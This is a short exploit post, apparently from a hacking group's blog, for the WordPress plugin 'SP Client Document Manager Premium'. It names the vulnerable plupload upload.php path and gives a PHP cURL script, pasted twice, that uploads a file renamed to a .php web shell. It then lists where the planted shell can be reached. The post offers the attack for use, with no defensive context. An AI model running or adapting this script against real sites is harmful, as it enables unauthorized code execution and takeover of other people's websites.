Exploit : /wp-content/plugins/sp-client-document-manager-premium/js/plupload/examples/upload.php
PHP :
<?php
$url = "asu/path/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@jetz666.jpg",
"name" => "jetz666.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
$post = array
(
"file" => "@jetz666.jpg",
"name" => "jetz666.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell Accces? : /wp-content/plugins/sp-client-document-manager-premium/js/plupload/uploads/jetz666 ; /wp-content/uploads/01/12/jetz666
; us ur brain
Thanks to https://www.facebook.com/groups/indoxploitpublic/ KHUSUSNYA KILLUA
; us ur brain
Thanks to https://www.facebook.com/groups/indoxploitpublic/ KHUSUSNYA KILLUA
 

ConversionConversion EmoticonEmoticon